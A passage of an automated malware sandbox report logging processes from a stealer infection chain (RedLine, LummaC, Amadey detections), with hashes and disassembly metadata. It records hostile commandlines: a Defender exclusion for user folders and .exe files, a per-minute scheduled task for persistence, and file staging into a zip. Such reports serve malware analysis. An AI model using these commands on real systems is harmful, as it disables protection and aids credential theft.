Imagebase:	0x7ff6cace0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:41:53
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:41:54
Start date:	15/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:41:54
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:41:54
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"
Imagebase:	0x5f0000
File size:	1'793'536 bytes
MD5 hash:	85A15F080B09ACACE350AB30460C8996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2271671273.0000000003B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000000.2217700639.00000000005F2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:41:55
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:41:55
Start date:	15/04/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Imagebase:	0x760000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	07:41:55
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xae0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	07:41:57
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Roaming\configurationValue\propro.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\configurationValue\propro.exe"
Imagebase:	0xa20000
File size:	311'296 bytes
MD5 hash:	CC90E3326D7B20A33F8037B9AAB238E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000000.2242693260.0000000000A22000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	07:41:57
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe"
Imagebase:	0x340000
File size:	553'984 bytes
MD5 hash:	1FC4B9014855E9238A361046CFBF6D66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000000.2242861766.0000000000342000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.2371502958.00000000125F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:41:57
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:41:59
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1001053001\gold.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001053001\gold.exe"
Imagebase:	0x3e0000
File size:	315'904 bytes
MD5 hash:	818B475B766C54DF6D845CB10B6EEDCF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:42:00
Start date:	15/04/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	07:42:00
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x150000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:42:00
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xbd0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.2567701880.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:42:03
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe"
Imagebase:	0x190000
File size:	428'544 bytes
MD5 hash:	0099A99F5FFB3C3AE78AF0084136FAB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000000.2303988986.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	07:42:04
Start date:	15/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F
Imagebase:	0x260000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:42:04
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:42:06
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
Imagebase:	0x190000
File size:	428'544 bytes
MD5 hash:	0099A99F5FFB3C3AE78AF0084136FAB3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000000.2335483499.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:42:06
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe"
Imagebase:	0x5e0000
File size:	329'352 bytes
MD5 hash:	1C7D0F34BB1D85B5D2C01367CC8F62EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:42:06
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:42:07
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:42:07
Start date:	15/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5564 -ip 5564
Imagebase:	0x6a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:42:07
Start date:	15/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 920
Imagebase:	0x6a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:42:09
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe"
Imagebase:	0x400000
File size:	4'397'448 bytes
MD5 hash:	BABAF4A8115EFF2FF0233CBB89D043CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	07:42:12
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe"
Imagebase:
File size:	1'858'560 bytes
MD5 hash:	B9A582F60E89571526C4A6DACBB6A576
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	07:42:12
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe"
Imagebase:	0x400000
File size:	461'825 bytes
MD5 hash:	49D2FD7E0A591B6AE99D11E5EDAAECF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000023.00000003.3016446842.0000000005841000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	07:42:18
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1001084001\random.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001084001\random.exe"
Imagebase:	0x980000
File size:	2'254'848 bytes
MD5 hash:	DA6F6F980F895340769B6811440D7D23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	07:42:19
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe"
Imagebase:	0x7ff6ad860000
File size:	2'665'984 bytes
MD5 hash:	FFADA57F998ED6A72B6BA2F072D2690A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	07:42:23
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe"
Imagebase:	0x27ab7580000
File size:	393'912 bytes
MD5 hash:	3170AED3EB44BD638CCE6F67650D4B50
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000027.00000002.3456932485.0000027AB9251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:42:23
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe"
Imagebase:	0x25579610000
File size:	392'888 bytes
MD5 hash:	81F2E982687C695EE0BBADF147FECA3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.3022619723.0000025500041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:42:23
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:42:23
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:42:25
Start date:	15/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	07:42:25
Start date:	15/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	07:42:27
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0x600000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	07:42:28
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	07:42:28
Start date:	15/04/2024
Path:	C:\Users\user\AppData\Local\Temp\1001107001\jok.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1001107001\jok.exe"
Imagebase:	0x680000
File size:	311'296 bytes
MD5 hash:	8510BCF5BC264C70180ABE78298E4D5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002F.00000000.2550237363.00000000006A1000.00000002.00000001.01000000.00000021.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	07:42:28
Start date:	15/04/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 500 -p 7684 -ip 7684
Imagebase:	0x7ff684840000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:42:29
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	07:42:29
Start date:	15/04/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7684 -s 1076
Imagebase:	0x7ff684840000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:42:29
Start date:	15/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0xba0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.7%
Total number of Nodes:	442
Total number of Limit Nodes:	4

Executed Functions

Function 008F5E8B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,?,008F5E8A,?,?,00000000,?), ref: 008F5EC7

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 58278b5f9304662cc517d8c0fa93d2d2117b4b0011b246a40b61cd5090260b00
Instruction ID: 7677e589156b5f1f6a72d16d89bcb86cbbe95a55a9d8298d5f04634b91c4eb4a
Opcode Fuzzy Hash: 58278b5f9304662cc517d8c0fa93d2d2117b4b0011b246a40b61cd5090260b00
Instruction Fuzzy Hash: 65E0863011154C6FCF257B24C81DA693B1AFF01352F100800FE04D6221CB35DD91D580

Uniqueness

Uniqueness Score: -1.00%

Function 052A090C Relevance: .2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b12bba6836e5e6719adcc8c04b0c99005ad14d6cc4ed0469f3a5d179299c33
Instruction ID: a3358d2673653f76560e709ef5623a00ad4078ab23f55cc52255fd7bc8722ac8
Opcode Fuzzy Hash: a1b12bba6836e5e6719adcc8c04b0c99005ad14d6cc4ed0469f3a5d179299c33
Instruction Fuzzy Hash: 3431CDEB17D251BF7202C9812B5CAFA6B6FE9C2B30730846BF507D6106E6E40E4A5131

Uniqueness

Uniqueness Score: -1.00%

Function 008C52E0 Relevance: 4.6, APIs: 3, Instructions: 134
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 008C535D
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,?), ref: 008C538B
RegCloseKey.KERNELBASE(?), ref: 008C5397

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 73aecfd8101aa5667b0b78b99aeb6a0cc194eb4e3b03260efffc671d1762665e
Instruction ID: a12441da56fa4632976f32a2ba9937fe81ce8a61013e35fed89499b52fe5f63f
Opcode Fuzzy Hash: 73aecfd8101aa5667b0b78b99aeb6a0cc194eb4e3b03260efffc671d1762665e
Instruction Fuzzy Hash: AB41E1B16101089BEB28CF28CC45BEE77B9FB45304F10826DF91597281D7B5AAC08B95

Uniqueness

Uniqueness Score: -1.00%

Function 008C9C90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 560
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008C9EB8

Strings

@3P, xrefs: 008CA411

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
